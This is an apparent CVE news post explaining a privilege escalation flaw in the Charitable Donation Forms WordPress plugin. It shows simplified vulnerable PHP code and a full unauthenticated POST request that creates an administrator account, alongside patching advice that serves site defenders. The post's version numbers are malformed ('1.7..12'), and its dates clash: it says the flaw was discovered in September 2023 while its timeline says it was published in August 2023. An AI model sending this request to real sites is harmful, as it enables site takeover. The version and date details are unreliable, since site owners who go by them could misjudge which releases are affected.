CVE CyberSecurity Database News

CVE-2023-4404 - Privilege Escalation in Charitable Donation Forms Plugin for WordPress (Up To v1.7..12) — Analysis and Exploit Guide

Poster -

In September 2023, a severe vulnerability—CVE-2023-4404—was discovered in the Charitable - Donation Forms WordPress plugin, affecting all versions up to and including 1.7..12. This bug allows unauthenticated attackers to escalate their privileges simply by crafting a POST request, giving themselves any WordPress user role (even administrator!) during account registration.

This post explains how this flaw works, provides exploit details, and points you to original references and code snippets, all written in clear, simple language.

What is CVE-2023-4404?

The Donation Forms by Charitable plugin makes it easy to accept donations on your WordPress site. However, it had a bug in the update_core_user function that doesn’t *properly restrict what role a new user can have during registration*.

Normally, when users sign up, they become "donors" with limited capabilities. But with this vulnerability, anyone can sign up as an "administrator" or any other role—by sending the role parameter in the registration request.

Vulnerable Code Snippet

Below is a simplified version (pseudo code) of the update_core_user function in vulnerable versions:

// Charitable includes/functions-users.php (simplified)
function update_core_user($user_id, $user_args) {
    // No validation of user capabilities before changing role!
    if ( isset( $user_args['role'] ) ) {
        wp_update_user( array(
            'ID' => $user_id,
            'role' => $user_args['role']
        ) );
    }
}

> Problem: Anyone can submit role=administrator (or any other) when registering, and the plugin will set the new account to that role—without checking if the user should have those permissions.

Step-by-step: How Would an Attacker Exploit This?

Suppose a site runs Charitable Donation Forms v1.7..12 or below (prior to the patched fix on September 12, 2023).

Here’s what such a malicious POST request might look like (replace URLs and fields as needed)

POST /?charitable_register_user=1 HTTP/1.1
Host: target-wordpress-site.com
Content-Type: application/x-www-form-urlencoded

user_login=maliciousadmin
&user_pass=password123
&user_email=hacker@example.com
&role=administrator

> Result: The account maliciousadmin is created as an administrator. The attacker can now log in and take over the site.

Real-World Impact

Attackers can easily automate this process and create admin accounts on any unpatched site using this plugin. As administrators, they can install malicious plugins, deface the website, or steal sensitive information.

Fix and Patch

The vulnerability was fixed in version 1.7..13. The patched code checks the current user's capabilities and prevents unauthenticated users from supplying a role during registration.

If you use this plugin:
Update immediately to the latest version on WordPress.org.

References

- Wordfence Advisory
- WPScan Entry
- Plugin Changelog

Closing Thoughts

CVE-2023-4404 is a very serious bug that was actively exploitable. Even attackers with zero access or authentication could instantly grant themselves admin power. If you run a WordPress site accepting donations with Charitable, patch ASAP and review your users.

Stay safe, keep your plugins up-to-date, and watch for these privilege escalation pitfalls!

*This guide is for educational purposes only—do not use these methods against systems you do not own or have explicit permission to test.*

Timeline

Published on: 08/23/2023 02:15:00 UTC
Last modified on: 08/28/2023 20:46:00 UTC